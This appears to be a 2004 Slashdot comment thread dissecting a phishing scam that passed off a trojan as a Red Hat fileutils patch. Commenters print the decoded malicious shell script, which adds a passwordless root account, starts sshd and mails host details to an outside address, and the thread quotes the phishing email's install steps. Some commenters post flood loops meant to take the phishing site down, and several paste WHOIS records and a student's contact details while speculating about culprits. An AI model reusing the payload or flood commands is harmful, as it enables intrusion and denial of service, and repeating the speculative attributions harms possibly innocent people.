I don't come here for intelligent discussion, to be honest. I get bored, come here, and post. I doubt the very generic group that is slashdot would be interested in my musings on state machines, and I'll be damned if I talk about the merits of FreeBSD administration because I'll just get flamed for "trolling" or some random untrue bullshit.

I really only take issue with this point because for some reason, people think /. is more than just the National Enquirer of the technology world. If you'd be honest with yourself, you'd find it much less engaging and much more enjoyable.

Unfortunately even the ACM these days is looking to make an extra buck and a lot of the articles in rags like Queue really ruin it.

About Time

[Mr.+Arbusto]

It's fishing, it happens on every platform and requires the user to do something they think is in their best interest. Nothing new.

Re:About Time

[seanvaandering]

It's fishing...

Do you have r00t? No? Go Phish!

Re:About Time

[Kenja]

"it happens on every platform

hasn't happened on my SGI yet.

Re:About Time

[BenjiTheGreat98]

Nor to my AS/400, either.

I'll try it...

[enginuitor]

I am downloading the file to a Knoppix box, and will then disconnect the ethernet cord, run the code, and report back.

Stay tuned.

Re:I'll try it...

[busonerd]

Same here. Lets use this thread for a discussion of wtf it does.

Re:I'll try it...

[damiam]

Make sure you use a chroot jail; Knoppix can still write to your hard drive.

Re:I'll try it...

[enginuitor]

I'm removing all local disks from the system. Just CD. Stay tuned for updates...

Re:I'll try it...

[busonerd]

[apologies for replying to myself]

The makefile compiles an application called inst that seems to have been created with the shc script compiler.. its rather obfuscated.. attempting to reverse engineer now

Re:I'll try it...

[eakerin]

Well I downloaded it, and uncompressed it.

There are 3 files:
fileutils-patch.bin
inst.c
Makefile

fileutils-patch.bin is an rpm with an incorrect extension, but it's valid. And an actual RPM from redhat (verified the GPG signature) Probably just put there to make it look bigger, and have something that came from redhat.

Well I was gonna put the package header information here, but slashcode didn't like it.

Signature verification using "rpm --checksig fileutils-patch.bin"

fileutils-patch.bin: (sha1) dsa sha1 md5 gpg OK

Re:I'll try it...

[superpeach]

I just looked at inst.c and changed it a bit to print what it runs instead of running it. Looks like a shell script hidden in some C (using shc, http://www.datsi.fi.upm.es/~frosal/sources/shc.htm l )

The working bit of the script is:

echo "Inca un root frate belea: " >> /tmp/mama
adduser -g 0 -u 0 -o bash >> /tmp/mama
passwd -d bash >> /tmp/mama
ifconfig >> /tmp/mama
uname -a >> /tmp/mama
uptime >> /tmp/mama
sshd >> /tmp/mama
echo "user bash stii tu" >> /tmp/mama
cat /tmp/mama | mail -s "Inca o roata" root@addlebrain.com >> /dev/null
rm -rf /tmp/mama

So, adds a user called bash with root privs, starts sshd and emails your IP address to someone.

Re:I'll try it...

[Cid+Highwind]

From a quick glance at the source, it looks like "inst" is an RC4 decryption program a hard-coded (but obfuscated) key. It will probably decrypt fileutils-patch.bin into the real exploit code.

Re:I'll try it...

The echo messages look Romanian. Doesn't really suprise me

Re:I'll try it...

[aredubya74]

Assuming (yeah, I know, big assumption) the whois info is relatively accurate, we may have an idea as to at least next step in the chain of figuring out the culprit, output of whois addlebrain.com:

Registration Service Provided By: StoreIQ, Inc.
Contact: technical@storeiq.com
Visit:

Domain name: addlebrain.com

Registrant Contact:
ABM Wireless
Domain Administrator (administrator@buywirelessdirect.com)
+1.7323331100
Fax: +1.NA
3587 US Highway 9 #132
Freehold, NJ 07728
US

Administrative Contact:
ABM Wireless
Domain Administrator (administrator@buywirelessdirect.com)
+1.7323331100
Fax: +1.NA
3587 US Highway 9 #132
Freehold, NJ 07728
US

Technical Contact:
ABM Wireless
Domain Administrator (administrator@buywirelessdirect.com)
+1.7323331100
Fax: +1.NA
3587 US Highway 9 #132
Freehold, NJ 07728
US

Billing Contact:
ABM Wireless
Domain Administrator (administrator@buywirelessdirect.com)
+1.7323331100
Fax: +1.NA
3587 US Highway 9 #132
Freehold, NJ 07728
US

Status: Locked

Name Servers:
dns1.name-services.com
dns2.name-services.com
dns3.name-services.com
dns4.name-services.com
dns5.name-services.com

The same address is used for two associated domains, buywirelessdirect.com (the email addy for this domain's tech contact) and storeiq.com (the email addy for buywirelessdirect.com's tech contact). The area code is accurate for that neck of the woods too, though I haven't tried the phone number (yet):

StoreIQ, Inc.
John Thompson (technical@storeiq.com)
+1.7323331145
Fax:
3587 US Highway 9 #213
Freehold, NJ 07728
US

Re:I'll try it...

[at_slashdot]

It's Romanian.

Re:I'll try it...

It is Romanian, but this does not mean that all Romanians programmers are hackers. Only the stupid ones :)

Re:I'll try it...

ok.. that's just weird. About 2 weeks ago I set work's firewall up to fwd SSH attempts to a sacrificial box on my network (it gave a login prompt but would deny any login attempts. I got a fuckton of login trys from some czech website with a 'mama' subdomain. about 10 root password guesses, and then 10 guesses of common login names. I diden't think much of it until I saw the names of the temp files created by this phisher.

Re:I'll try it...

[Colin+Smith]

The mail server for addlebrain.com is

Non-authoritative answer:
addlebrain.com mail exchanger = 0 sitemail.everyone.net.

Though I'd bet that their system has been compromised.

Re:I'll try it...

[superpeach]

what does it say? :)

Re:I'll try it...

nmap addlebrain.com ...

Every port is open? Is it running tcpdump?

Probably is compromised.

Re:I'll try it...

Didn't mean to insult Romanian programmers (spent a few years working on a project in Bucharest), but there are a large number of Phishing schemes originating there and Bulgaria.

Re:I'll try it...

don't worry, we consider this a compliment.

Re:I'll try it...

[at_slashdot]

echo "Inca un root frate belea: "
-translation: one more "root" brother trouble

echo "user bash stii tu" >> /tmp/mama
-translation: :user bash" you know

cat /tmp/mama | mail -s "Inca o roata"
-translation: one more wheel (roata -- root... it sounds alike)

It doesn't say anything meaningful, the guy is an idiot.

Re:I'll try it...

[hattmoward]

Generally an every-port-open result from nmap indicates use of a firewall. Watchguard's products tend to do that, and iptables can be made to do similar also.

Re:I'll try it...

[allden]

What are the chances that his machine is hacked into by someother person?

Re:I'll try it...

[athakur999]

If you want to be really safe, fire up that copy of VMWare you acquired off some BitTorrent site last week. :)

Re:I'll try it...

[dacarr]

So perhaps we just start sending random emails to 'root@addlebrain.com' from nonexistant addresses?

Re:I'll try it...

[mackstann]

Funny they didn't redirect stderr; no wonder people were getting error messages spewed at them.

And rm -rf a file? Seems like whoever did this was an amateur. (surprise)

Re:I'll try it...

using rpm2cpio and then decompressing the resultant cpio file, it actually is just a bunch of normal linux utils (diff'd them against the Redhat =) Server @ work). It's just the installer that is nasty. it was a simple as:
for i in *
do
tmp=/bin/$i
diff --brief $t ./$i
done

in the bin directory from the archive... so your right, it's pulled directly from Red Hat and put there just to make it look more legit.

Re:I'll try it...

[SynKKnyS]

Argh, notice it is an IIS server. And, notice that they offer free email. Put the two together. Someone registered the username "root" apparently. Tricksy.

Re:I'll try it...

[commodoresloat]

I was going to suggest that addlebrain was just a rooted box, but you might be right. Definitely a cute twist if so.

wont work

Don't most Fedora people use yum to keep their systems up to date? I don't think many Fedora/Red Hat admins would fall for this.

Re:wont work

[bcs_metacon.ca]

Here's hoping *none* would. Fedora Core gives you the option of using up2date or yum right out of the box, and some people use apt. All three do GPG signature checking by default.

I hope anyone stupid enough to fall for this obvious scam would also be too dumb to know how to compile and install the software anyway.

This was a pretty lame attempt. If someone *really* wanted to cause havock, they'd hack one of the central repositories and insert poison packages into a trusted source. Of course, that's orders of magnitude more difficult. I mean, that hasn't even happened to Windows Update yet! :-)

Re:wont work

[Antique+Geekmeister]

Unfortunately, a lot of Linux users like the gentoo approach, where you pull random stuff off of the net "because someone said it was good" and compile and install it locally, rather than installing signed packages or vetting the source of any tarballs you add to your system. This includes some Fedora and RedHat users, especially since Yum was never officially published by RedHat for anything other than Fedora, and since RedHat hasn't been publishing security updates for RedHat 9 or earlier for some time now.

Expect a lot of newbie home administrators to get caught by this, especially at academic sites where an "open environment" and "fostering creativity" take precedence over stability and security and reviewing your code before you run it.

Re:wont work

[Ulysses]

OK, first off you've obviously never actually used Gentoo, or you would know that your statment is entirely untrue.

The Gentoo package administration utility (portage) automatically performs a checksum comparison of all downloaded source files before compilation and/or installation. Valid checksum values for all portage managed packages are stored and distributed on the Gentoo mirrors, in the same manner that Red Hat provides checksum values for all their rpm packages.

Frankly, I think it's much more likely that some newbie Red Hat or Fedora Core admin will download and install a trojan rpm package off the net, than that an equivalent Gentoo admin will download a trojan source file of the net, compile it correctly, and install it.

I say this having administered both Rad Hat and Gentoo environments for several years.

Re:wont work

[mauryisland]

You make a valid point about the GPG signatures. There's a problem with the test versions of Fedora, however. Most of the packages in development directories are not signed. That shouldn't bother the users of the official releases, though.

Re:wont work

Yum was never officially published by RedHat for anything other than Fedora

Thats why non-Fedora users have up2date.

RedHat hasn't been publishing security updates for RedHat 9 or earlier for some time now.

That's what Fedora-Legacy is for.

newbie home administrators

Please stop using the word "administrators". By definitaion anyone with a Linux or FreeBSD machine at home will know their own root password, but that doesn't make them an admin. You have to have other users to be an admin.

Re:wont work

[Antique+Geekmeister]

I've used Gentoo, although not been a developer for it. The idea that you rebuild everything on the fly is not a good one, and encourages this sort of whackiness because to *get* the patches or the features, you often do have to go straight to some weird website out Timbukto and rebuild the tarballs yourself on the fly.

I wonder...

[bennomatic]

...was this set up by SCO, Microsoft or one of the anti-virus folks who want to prove that Linux isn't without its weaknesses...?

Re:I wonder...

/me straps on his Foil Hat.

MAYYYYBE!

Re:I wonder...

You must TRYING to get the tin-foil hat award.

Re:I wonder...

[Forezt]

or better yet, it Microsoft paid the Yankee group to do it for them, and then do an "independent study" on it.

Re:I wonder...

wouldn't be surprised if they were...

Re:I wonder...

[ForestGrump]

No, it appears that they oursourced it to Raymond Jackson.

Domain Name.......... fedora-redhat.com
Creation Date........ 2004-10-24
Registration Date.... 2004-10-24
Expiry Date.......... 2005-10-24
Organisation Name.... Raymond Jackson
Organisation Address. 224 Cedar Avenue
Organisation Address.
Organisation Address. New York
Organisation Address. 95301
Organisation Address. NY
Organisation Address. UNITED STATES

Admin Name........... Raymond Jackson
Admin Address........ 224 Cedar Avenue
Admin Address........
Admin Address........ New York
Admin Address........ 95301
Admin Address........ NY
Admin Address........ UNITED STATES
Admin Email.......... rayjackson23@yahoo.com
Admin Phone.......... +1.2098994533
Admin Fax............

Re:I wonder...

[Temporal]

I guess the Yankees don't have anything better to do this week, do they?

Re:I wonder...

dood, why the freak do retards post on slashdot? all these ignorant fucking 'whois info' posts. wow, you're friggin' special. dammit, I'm just sick of the wannabe 'hackers' on here. note that the friggin' domain info is wrong, not to mention that the doomain is registered via an Australian registrar (melbourneit.com).
so there. he's Australian, American, and Romanian.

Here's what WHOIS says:

[SIGBUS]

[Querying whois.internic.net]
[Redirected to whois.melbourneit.com]
[Querying whois.melbourneit.com]
[whois.melbourneit.com]

Domain Name.......... fedora-redhat.com
Creation Date........ 2004-10-24
Registration Date.... 2004-10-24
Expiry Date.......... 2005-10-24
Organisation Name.... Raymond Jackson
Organisation Address. 224 Cedar Avenue
Organisation Address.
Organisation Address. New York
Organisation Address. 95301
Organisation Address. NY
Organisation Address. UNITED STATES

Admin Name........... Raymond Jackson
Admin Address........ 224 Cedar Avenue
Admin Address........
Admin Address........ New York
Admin Address........ 95301
Admin Address........ NY
Admin Address........ UNITED STATES
Admin Email.......... rayjackson23@yahoo.com
Admin Phone.......... +1.2098994533
Admin Fax............

Tech Name............ YahooDomains TechContact
Tech Address......... 701 First Ave.
Tech Address.........
Tech Address......... Sunnyvale
Tech Address......... 94089
Tech Address......... CA
Tech Address......... UNITED STATES
Tech Email........... domain.tech@YAHOO-INC.COM
Tech Phone........... +1.6198813096
Tech Fax............. +1.6198813010
Name Server.......... yns1.yahoo.com
Name Server.......... yns2.yahoo.com

Re:Here's what WHOIS says:

[barzok]

95301 is Atwater, CA. There are at least 2 Cedar Avenues in NY (Staten Island and The Bronx), and one in Atwater.

Re:Here's what WHOIS says:

[datastalker]

That phone number by area code and exchange is for Milton, CA, so chances are the entire WHOIS record is false.

Re:Here's what WHOIS says:

[Shandon]

Data looks contradictory, but also be wary of the joe-job. Raymond Jackson may be an unpopular name to have right about now...

Re:Here's what WHOIS says:

[Ann+Coulter]

Did anyone save an e-mail from this guy? If this whois is fake, maybe the e-mail can tell us more. Just a thought.

Re:Here's what WHOIS says:

[bconway]

Don't forget the domain that the script emails, root@addlebrain.com:

Found a referral to whois.enom.com.

Registration Service Provided By: StoreIQ, Inc.
Contact: technical@storeiq.com
Visit:

Domain name: addlebrain.com

Registrant Contact:
ABM Wireless
Domain Administrator (administrator@buywirelessdirect.com)
+1.7323331100
Fax: +1.NA
3587 US Highway 9 #132
Freehold, NJ 07728
US

Administrative Contact:
ABM Wireless
Domain Administrator (administrator@buywirelessdirect.com)
+1.7323331100
Fax: +1.NA
3587 US Highway 9 #132
Freehold, NJ 07728
US

Technical Contact:
ABM Wireless
Domain Administrator (administrator@buywirelessdirect.com)
+1.7323331100
Fax: +1.NA
3587 US Highway 9 #132
Freehold, NJ 07728
US

Billing Contact:
ABM Wireless
Domain Administrator (administrator@buywirelessdirect.com)
+1.7323331100
Fax: +1.NA
3587 US Highway 9 #132
Freehold, NJ 07728
US

Status: Locked

Name Servers:
dns1.name-services.com
dns2.name-services.com
dns3.name-services.com
dns4.name-services.com
dns5.name-services.com

Creation date: 18 Feb 2000 17:02:59
Expiration date: 18 Feb 2005 17:02:59

Re:Here's what WHOIS says:

[ironfrost]

There IS a Raymond Jackson that lives at that address (except that it's in CA rather than NY, as has been previously noted) so it's not completely made up. Although, whether he's really the perpetrator or simply someone the real criminal doesn't get on with is still a matter of doubt. In any case, all his details (including e-mail address and phone number) can be easily found from a Google search - he runs a chapter of a Historical Minatures Gaming Society in his area (HMGS West, near the bottom of the page).

Re:Here's what WHOIS says:

I did a search for that address with that zip code and found one website (and a mapquest link) and the website had a man named Raymond James Jackson. http://www.hmgs.org/pocs.htm (at the bottom of the page.

Re:Here's what WHOIS says:

[DrLZRDMN]

yes but which Raymond Jackson?

Ones a teacher, one is guilty of child abuse (something to be unpopular for) and one just lost a football game today (/thinks of ace ventura plot)

Re:Here's what WHOIS says:

Don't forget the domain that the script emails, root@addlebrain.com

Sorry to dissapoint you, but I doubt he owns the domain - they offer free webmail, so it's likely he just signed up for an account. Presumably they didn't stop anyone from getting the username 'root' - I signed up for 'administrator' just now (password 'monkey' if you don't believe me) with no problems.

Re:Here's what WHOIS says:

Isn't this domain a pretty clear violation of copyright laws? I mean, it is quite patently designed to deceive consumers into believing that it is the legitimate website of "Fedora Redhat". Unlike say, fedora-redhat-sucks.com, which has a 1st Amendment right to talk about fedora-redhat, or fedora-redhat-discussion.com, which has a fair use to talk about redhat, so long as it doesn't confuse consumers, this website is blatantly and maliciously attempting to confuse consumers. WHOIS/InterNIC or whoever should pull the plug and put up a notice explaining that it has been removed pending arbitration (which of course, this site should lose).

The same thing goes for all those paypal-security.com and pa1(one)pal.com websites. The domain name registrars shouldn't have authorized the names in the first place and should pull the plug when notified.

Re:Here's what WHOIS says:

From previous reports, the patch was originally hosted at www.stanford.edu/~joeio - the user is Irene Joe, a graduate law student at Stanford.

I can't imagine that anyone would be stupid enough to link themselves with this so obviously, so the person behind all this must have hijacked her account. Perhaps he/she hijacked Mr Jackson's as well?

Re:Here's what WHOIS says:

(password 'monkey' if you don't believe me)

I will confirm that the parent AC was right. But I just couldn't stand it so I changed it before someone even more anonymous than I did, which was bound to happen. Somehow it just didn't seem ethical not to change it and leave it exposed for abuse. Now what do you recommend I do?

Re:Here's what WHOIS says:

"That phone number by area code and exchange is for Milton, CA, so chances are the entire WHOIS record is false."

Milton? Google sez Milton is area code 209, and so is Atwater. Atwater has a Raymond Jackson at 224 Cedar Avenue.

"Bummer of a birthmark, Hal."

If you're going to falsify records, doing it with real info certainly slows down the chase a bit. I hope Mr Jackson isn't too inconvienienced when he's paused for questioning.

Curious that much works out though. Might give a bit of a lead; ie, the perp may not have picked this guy out of a hat. Kinda odd having it all that close but different number.

Reverse lookup no result. Could be a cell phone.

Re:Here's what WHOIS says:

[wpc4]

Dialed the #, big surprise. It's disconnected.

Re:Here's what WHOIS says:

[zogger]

that's one of my favorite far sides

Re:Here's what WHOIS says:

[TheLittleJetson]

That phone number by area code and exchange is for Milton, CA, so chances are the entire WHOIS record is false.

Actually, it's a typo. I've been meaning to fix it...

Re:Here's what WHOIS says:

email the admin and tell them that usernames that refer to administrative roles should not be available to everyone.

Re:Here's what WHOIS says:

209 is the Fresno area's area code before the 209/559 split a few years back.

As a Raymond from Fresno, I am explicitly condemning this action.

Re:Here's what WHOIS says:

Isn't this domain a pretty clear violation of copyright laws?

No, but it's a violation of trademark laws. A nit? Sure, but it's a mistake people do way too often.

And yeah, if it's not going away otherwise, RH can probably pull the plugs with that, but it might take some time, I wouldn't be so sure notice is enough, it might, since this is so clear, and they ought to play nice, but AFAIK there's nothing like DMCA here that would actually force registrars to bend over without a court battle.

Re:Here's what WHOIS says:

[petrus4]

I suspect Mr Raymond Jackson could be in for a visit from the proverbial Men In Black by the end of the week. *evil grin*

Re:Here's what WHOIS says:

Well the HMGS did come in for some abuse and turmoil over internal politics earlier this eyar. Perhaps it's a hit-Rumanian wargamer geek with a grudge

Re:Here's what WHOIS says:

Yes, but it shouldn't be a matter of not wanting to bend over-- the registrars should be good citizens and not accept money for domains like pa1pal-security.com, since doing so knowingly makes the morally (if not legally) accessories to the crime. When shit like this get pulled, the registrars should clear it up as soon as they find out about it.

As I said before, paypal-sucks.com is free speech and paypal-discussion.com (if properly labeled as not affiliated with paypal.com) is fair use, but stuff like redhat-fedora.com is malicious fraud, and the registrars have a responsibility to help clear it up.

Re:Here's what WHOIS says:

[hoofie]

Another email address : madhi_ray@hotmail.com

Warning : This MAY NOT be the right person...

Re:Here's what WHOIS says:

[k4_pacific]

I had some similar fun with a Nigerian scammer once that way. I pretended to be interested in his offer and I went to his free email provider and signed up as mail-admin, and sent him an email telling him his account is being monitored for illegal activity and threatening to close his account. Because of this, each time he contacted me, he politely asked me to email him at a new address. I'd send the same threatening form letter to the new address from "mail-admin". He apparently figured it out and gave up after a few iterations.

Re:Here's what WHOIS says:

the registrars should be good citizens and not accept money for domains like pa1pal-security.com

They should of course, but such is the world we live in, that nobody seems to care about anything but money.

Looks like it's no more, so someone managed to get it down, or they actually did the right thing, but I don't think so...

Re:Here's what WHOIS says:

[Spice-Doctor]

Caught wind of this at TMP. Slashdot is cool. Now how did HMGS get involved? Iam a Life member and a founder of a couple chapters. Courious?

Re:Here's what WHOIS says:

It's probably way too late for you to be reading this, but just in case you've got e-mail reply turned on: HMGS isn't involved at all. It's just that the guy happens to have all his information (which matches up with the ones in the domain registration, but also provides more detail) on that webpage, due to him running a chapter of HMGS.

In case the site goes down..

Original issue date: October 20, 2004
Last revised: October 20, 2004
Source: RedHat

A complete revision history is at the end of this file.

Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges. Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that *BSD and Solaris platforms are NOT affected.

The RedHat Security Team strongly advises you to immediately apply the fileutils-1.0.6 patch. This is a critical-critical update that you must make by following these steps:

* First download the patch from the Stanford RedHat mirror: wget www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz or directly here.
* Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
* cd fileutils-1.0.6.patch
* make
* ./inst

Anybody running RedHat and Fedora are strongly adviced to apply this patch! Read more about this vulnerability at www.redhat.com or www.fedora.redhat.com

Thank you for your prompt attention to this serious matter,

RedHat Security Team.

Copyright © 2004 Red Hat, Inc. All rights reserved.

-
http://www.freestuffguide.net/

Re:In case the site goes down..

[marmoset]

I got a similar phish yesterday, only pointing to www.stanford.edu/~joeio/fileutils-1.0.6.patch.tar. gz. I guess that was the earlier draft, before they secured the more impressive domain name.

Re:In case the site goes down..

[russsell]

a quick search reveals...
joeio@stanford.edu appears to be for a student called Irene Joe ... and Irene seems to be studying Law!

Re:In case the site goes down..

Black Law Students Association???

Holy fuck, they're studying the Law of the Jungle! At Stanford! Stop this world, I'm getting off.

Re:In case the site goes down..

[Drantin]

by googling...

"Please contact me by email joeio@stanford.edu or by phone (650) 497-6154 "

Real link?

[chrispyman]

Why not just use the real link and slashdot their site into oblivion!

Re:Real link?

[JamesTRexx]

I see great slashdotters think alike. :-)

Re:Real link?

[crow]

It looks like it's probably hosted by Yahoo!

traceroute www.fedora-redhat.com
traceroute: Warning: www.fedora-redhat.com has multiple addresses; using 66.218.79.149
traceroute to premium4.geo.yahoo.akadns.net (66.218.79.149), 30 hops max, 38 byte packets

I'm getting about 3MB/s right now. We won't slashdot the server, but we may well use up the bandwidth quota that this person bought.

Re:Real link?

[Shandon]

Hmmm. The "real link" points to an address in Yahoo's Webhosting address space.

vimes:~$ hostx fedora-redhat.com
fedora-redhat.com A 66.218.79.148
fedora-redhat.com A 66.218.79.149
fedora-redhat.com A 66.218.79.155
fedora-redhat.com A 66.218.79.147

vimes:~$ hostx 66.218.79.148
Name: p4w2.geo.scd.yahoo.com
Address: 66.218.79.148

Arin sez:

NetRange: 66.218.64.0 - 66.218.95.255
CIDR: 66.218.64.0/19
NetName: A-YAHOO-U23
NetHandle: NET-66-218-64-0-1
Parent: NET-66-0-0-0-0
NetType: Direct Allocation
. . .

Their servers might be harder to slashdot than the average bear's ... I've tried to find an explicit abuse@ address for the Yahoo webhosting biz, but there's nothing but that nasty little Customer Care form that doesn't even provide for making a complaint against the webhosting users. I got something accepted, but I'm not sure what'll be done, when.

-- shandon

Re:Real link?

[jesser]

They wanted to see if they could Slashdot Slashdot.

Re:Real link?

[vi-rocks]

Yes, its does look like Yahoo .. check of the last line of HTML source.

<!-- text below generated by server. PLEASE REMOVE --><!-- Counter/Statistics data collection code --><script language="JavaScript" src="http://hostingprod.com/js_source/geov2.js"></ script><script language="javascript">geovisit();</script><noscrip t><img src="http://visit.webhosting.yahoo.com/visit.gif?u s1098667747" alt="setstats" border="0" width="1" height="1"></noscript>

Re:Real link?

[acidblood]

This seems like a very good idea. Normally I wouldn't be for vigilante justice, but this guy deserves it.

I'm running the following script on my box, and I recommend others to do the same.

while true; do wget www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz ; rm fileutils-1.0.6.patch.tar.gz; done

If enough people do the same, either the site is taken offline, or we're gonna cost him a pretty penny.

Re:Real link?

No need to write to the hard drive:

while true; do wget -O - www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz ; done > /dev/null

Re:Real link?

[Saeger]

And I think I'll "benchmark" the site a few million times.

/usr/sbin/ab2 -n 10000000 -c 10 'http://www.fedora-redhat.com/?you=asshole&garbage =XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXX'
This is ApacheBench, Version 2.0.40-dev <$Revision: 1.121.2.8 $> apache-2.0
Copyright (c) 1996 Adam Twiss, Zeus Technology Ltd, http://www.zeustech.net/
Copyright (c) 1998-2002 The Apache Software Foundation, http://www.apache.org/

Benchmarking www.fedora-redhat.com (be patient)

Re:Real link?

[supermonkeyball]

So /.'ing the site won't work, but if the web admins at Red Hat want to have a little fun, then might I suggest you change the image of http://www.redhat.com/g/chrome/logo_rh_home.png (check the image link on the fedora-redhat.com site) to say something to warn others about the phish?

Or just exchange that with hello.jpg (think goatse)

Re:Real link?

[Saeger]

I guess I should have viewed the source of that site before I fired that line off, seeing as the site hotlinks an image on redhat.com.

Oops.

--

Re:Real link?

[irc.goatse.cx+troll]

Why don't they just replace the image with some mod_rewrite magic (or cgi/php) to check referer, and if its refered from that site, put up a huge ackbar DONT DOWNLOAD IT, ITS A TRAP ?

Surely redhat engineers should know how to do that, if not, just ask anyone in #GNAA how to redirect an image.

Re:Real link?

That's a good idea. Why don't you suggest it to them, rather than posting it to slashdot?

Re:Real link?

Ran this for a few hours. Site's gone now. :)

Re:Real link?

[B2382F29]

Try

while true; do wget -O /dev/null www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz done

that way it doesn't use up diskspace.

Security only works when you know what to check

[LostCluster]

Red Hat's reply to this issue is pretty straight-forward. They've already taken all of the steps to properly sign their real updates, and this should stand out as a fake because it lacks all of those digital signatures.

However, what good is that against Joe User who falls for the bait and things the e-mail is authentic because they believe everything they read on their screen? They don't know to check for the "security seals" and since they don't see any red flags indicating that this is bogus.

It's something in info security that disconnects when dealing with average users. They don't know what to look for, and therefore the absense of those marks is not alarming to them as it is for us... a little something that needs to be cleaned up before Linux is ready for desktop primetime.

Re:Security only works when you know what to check

Of course, I'm all for cleaning this up. Shall we be using Uzis or AK-47s to dispose of the idiots?

Re:Security only works when you know what to check

[OmegaBlac]

It's something in info security that disconnects when dealing with average users. They don't know what to look for, and therefore the absense of those marks is not alarming to them as it is for us... a little something that needs to be cleaned up before Linux is ready for desktop primetime.

Yet that hasn't stopped Windows from being ready for "desktop primetime" huh? There will always be dumb-witted joe users that will get burnt from these lame social engineering scams regardless of the OS. These very well could be the same people who will be taking advantage of offline as well. Linux is already on the desktop. It has been ready for primetime for awhile. Of course there is nothing it can do to protect the user from the biggest security threat of them all: the user themselves.

Re:Security only works when you know what to check

[LnxAddct]

Well for one, fedora by design is very non-root centric and I don't believe any user will typically be running as root. There is no need for an average user to ever be root, even up2date jsut asks for the root password when you double click it. Because of this adduser as well as most(all) of the other commands aren't in your path and all this spits out is a bunch of "bash: adduser: command not found". Even if it was in your path, you don't have permission to run it. As long as your not running as root this particular virus still isn't a problem, although thats not to say that future variations won't be. I assume Yahoo and Red Hat will take care of this quickly and whatever Romanian (In one of the other threads it was pretty much confirmed thats where this originated from) is going to be dealt with.
Regards,
Steve

Re:Security only works when you know what to check

Red Hat should be pursuing the culprit for trademark infringement. Committing fraud using the identity of a well-known company is incredibly stupid.

Whois

[rsrsharma]

Whois of fedora-redhat.com:

Domain Name.......... fedora-redhat.com
Creation Date........ 2004-10-24
Registration Date.... 2004-10-24
Expiry Date.......... 2005-10-24
Organisation Name.... Raymond Jackson
Organisation Address. 224 Cedar Avenue
Organisation Address.
Organisation Address. New York
Organisation Address. 95301
Organisation Address. NY
Organisation Address. UNITED STATES

Admin Name........... Raymond Jackson
Admin Address........ 224 Cedar Avenue
Admin Address........
Admin Address........ New York
Admin Address........ 95301
Admin Address........ NY
Admin Address........ UNITED STATES
Admin Email.......... rayjackson23@yahoo.com
Admin Phone.......... +1.2098994533
Admin Fax............

Tech Name............ YahooDomains TechContact
Tech Address......... 701 First Ave.
Tech Address.........
Tech Address......... Sunnyvale
Tech Address......... 94089
Tech Address......... CA
Tech Address......... UNITED STATES
Tech Email........... domain.tech@YAHOO-INC.COM
Tech Phone........... +1.6198813096
Tech Fax............. +1.6198813010
Name Server.......... yns1.yahoo.com
Name Server.......... yns2.yahoo.com

Looks like somebody's gonna get arrested. ;)

Re:Whois

[suckmysav]

> Looks like somebody's gonna get arrested. ;)

Let's all hope that one day some Russian gangster picks your name out of his Random-Grab-Bag of names and uses it in a phishing scam.

Then you might understand the wisdom of "innocent until proven guilty"

Finally...

[Seabass55]

Something that will weed out dumb linux users just like most all Windows viruses attack the dumb windows users.

Re:Finally...

[JamesTRexx]

Maybe we should stop using virusscanners and do like nature, those that survive all the diseases will evolve into a better species (of users).

Re:Finally...

[Fapestniegd]

Debian has been weeding out incompetent users with its "impossible to use" installer for years.

It keeps the "Mandrake Crew" off of the debian-users lists.

Re:Finally...

[Shulai]

The difference is, Linux still stands against most attacks that even smart Windows users are vulnerable, as early infections of worms not yet in antivirus databases.

Re:Finally...

[KiloByte]

The Woody installer isn't "impossible to use"! I always boot it, mkfs, ftp down my pre-installed tarball and go on.

Oh, wait...

Stupid Tricks?

[dj_cel]

It seems to me that most people using any version of Linux will not fall victim to these sorts of things. I would expect something like this to work for the majority of windows users, but as the audience of Linux is mostly tech-savy, I can't see this becoming a problem. The problem is going to be when larger groups of desktop users make the jump to Linux. What can be done to prevent this from happening in the future? What failsafes can be built into Linux to prevent people with less than average pc skills from destroying their systems?

Re:Stupid Tricks?

[stratjakt]

I wouldn't say the audience of linux is tech-savvy, they just think they are.

The stupidest people I've ever met are the ones who think they know everything. Your average 14 year old who installs gentoo and now considers himself a giant in the world of computing fits the bill. I've suggested rm -rf / (logged in as root, of course) as a solution to email routing problems, and they do it.

They'd easily fall for this. More easily, I'd say, then the average clueless user, since many of them are slightly technophobic. You just have to tickle their egos. Put some big techical sounding words and acronymns in the email, and they'll suck it down.

Re:Stupid Tricks?

[dj_cel]

This is exactly what I'm talking about though, I myself am in noway an expert or even close, but as a community we need to address these types of issues. I may sound like a pussy or something, but I want to have the position that we are a community moving towards a goal, ending the monopoly that runs most of our lives. It would be better to inform the young minds of proper ways and tecniques of using Linux then to slam them, putting them in their place is one thing, but with the other type of mentality, we drive away the very people that will help us in the future of the software revolution. Another thing, these kids will ultimately move their parents and friends who are less skillfull at using a computer to other platforms, that's why I emphasize the necessity to train them properly, build in security systems that are logical (if I'm speaking nonsense let me know, I'm not an admin!) to "most" and by most I mean your parents and friends who buy dell pc's becuase they come with "the latest windows thing." We are trying to overturn an oppressive movement and resistance through negativity will only come back to byte us in the ass.

Re:Stupid Tricks?

[anethema]

If only there was some way to make the computer not able to run as root during normal use. Maybe make linux harrass you if you spend more than 10mins in root, have it pop up a message every minute or so.

Of course make this able to be disabled, but make it moderatly difficult to do so. Editing a configuration file in some obscure linux directory should do fine.

This way the average user will have motivation to simply make a non root account (make this part of the default install process. Set a root password and create a non root account. Something like windows's "enter your name" or something..could make it fill in the name automagically or simply log in automatically in a kind of single user mode.)

